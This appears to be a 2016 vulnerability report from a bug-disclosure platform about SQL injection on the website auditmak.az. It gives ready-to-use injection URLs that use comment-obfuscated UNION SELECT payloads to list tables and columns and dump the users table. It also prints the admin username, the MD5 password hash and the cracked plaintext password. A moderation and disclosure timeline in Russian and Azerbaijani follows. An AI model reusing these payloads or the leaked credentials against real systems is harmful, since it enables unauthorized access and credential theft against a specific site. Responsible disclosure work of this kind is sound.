SQL injection

auditmak.az 22 Июнь 2016, 12:06

Подробная информация

SQl inject here: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27%20%2F*!12345union*%2F%20%2F*!12345select*%2F%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11--%20-%27
Table names: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27+/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,/*!12345group_concat(table_name)*/,9,10,11+/*!12345from*/+/*!12345information_schema.tables*/+/*!12345where*/+/*!12345table_schema=database()*/--+-%27
USers: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27+/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,/*!12345group_concat(column_name)*/,9,10,11+/*!12345from*/+/*!12345information_schema.columns*/+/*!12345where*/+/*!12345table_name=0x7573657273*/--+-%27
Username and password dump: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27+/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,/*!12345group_concat(username,0x3a,password)*/,9,10,11+/*!12345from*/+/*!12345users*/--+-%27
username: admin
password: 5edc2995b340ac9fd2cc555e94384c87 md5 hash( makaudit123 )

Скриншоты

Записи

  • 21 Октябрь 2016, 14:01
    Статус уязвимости
    Нет ответа от источника

  • 04 Октябрь 2016, 10:04
    Уязвимости присвоен балл
    За перевод уязвимости дано переводчику 10 баллов

  • 04 Октябрь 2016, 10:04
    Уязвимости присвоен балл
    За перевод уязвимости дано автору 0 баллов

  • 07 Сентябрь 2016, 13:51
    Статус уязвимости
    Отправлено сообщение об уязвимости на электронный адрес источника

  • 07 Сентябрь 2016, 11:31
    Уязвимости присвоен балл
    Модератор присвоил 10 баллов из 10-и на уязвимости

  • 07 Сентябрь 2016, 11:12
    Статус уязвимости
    Подтверждено со стороны модератора

  • 06 Сентябрь 2016, 18:03
    Уязвимость изменена
    Уязвимость изменена

  • 30 Июнь 2016, 14:49
    Уязвимость отказана
    Linklər qeyd edilən məlumatı göstərmir. Zəhmət lmasa screenlər yollayın.

  • 22 Июнь 2016, 12:06
    Добавлена уязвимость
    Добавлена уязвимость на BUGemot